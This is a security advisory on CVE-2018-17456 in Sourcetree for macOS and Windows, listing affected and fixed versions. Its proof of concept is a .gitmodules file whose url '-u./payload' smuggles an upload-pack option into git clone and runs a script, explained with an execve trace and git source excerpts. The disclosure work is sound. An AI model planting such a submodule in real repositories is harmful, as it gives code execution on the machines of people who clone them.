ASA-2019-00128 – Sourcetree: Input validation vulnerability via Git submodules

Allele Security Alert





Input validation vulnerability via Git submodules





Affected version(s)

Sourcetree for macOS starting with 1.2 before version 3.1.1
Sourcetree for Windows starting with 0.5a before version 3.0.17

Fixed version(s)

Sourcetree for macOS version 3.1.1
Sourcetree for Windows version 3.0.17

Proof of concept



Sourcetree for macOS before version 3.1.1 and Sourcetree for Windows before version 3.0.17 were both vulnerable to CVE-2018-17456. A remote attacker with permission to commit to a git repository linked in Sourcetree for macOS or Windows is able to exploit this issue to gain code execution on the system.

Technical details

The .gitmodules file looks as follows:

[submodule "x:x"]
path = x:x
url = -u./payload

The actual command being injected is set by the url, -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path, this part is needed to actually get the payload script executed.

The path will end up as the repository URL in the subsequent clone operation:

execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...

As the actual URL from .gitmodules is interpreted as the -u argument.

The colon is due to the fact, that the colon character let us go past those lines in transport.c:

} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
    struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
    ret->data = data;
    ret->vtable = &bundle_vtable;
    ret->smart_options = NULL;

Due to url_is_local_not_ssh will return false due to the colon in the path. And therefore later on in the code the smart_options containing the uploadpack setting are still in place:

} else {
    /* Unknown protocol in URL. Pass to external handler. */
    int len = external_specification_len(url);
    char *handler = xmemdupz(url, len);
    transport_helper_init(ret, handler);

    if (ret->smart_options) {
        ret->smart_options->thin = 1;
        ret->smart_options->uploadpack = "git-upload-pack";
        if (remote->uploadpack)
            ret->smart_options->uploadpack = remote->uploadpack;
        ret->smart_options->receivepack = "git-receive-pack";1
        if (remote->receivepack)
            ret->smart_options->receivepack = remote->receivepack;

The constraint to have a colon in the path seems to hinder exploitation on Windows as a colon is a forbidden character within a path on Windows. However as noted by some people during the disclosure: Git running within the Windows Subsystem for Linux or cygwin will allow exploitation on Windows hosts.


Terry Zhang (Tophant)


Sourcetree Security Advisory 2019-03-06

Input validation vulnerability via Git in Sourcetree for Mac – CVE-2018-17456

Input validation vulnerability via Git in Sourcetree for Windows – CVE-2018-17456

[Announce] Git 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1


RCE via Git submodules PoC




If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 12, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.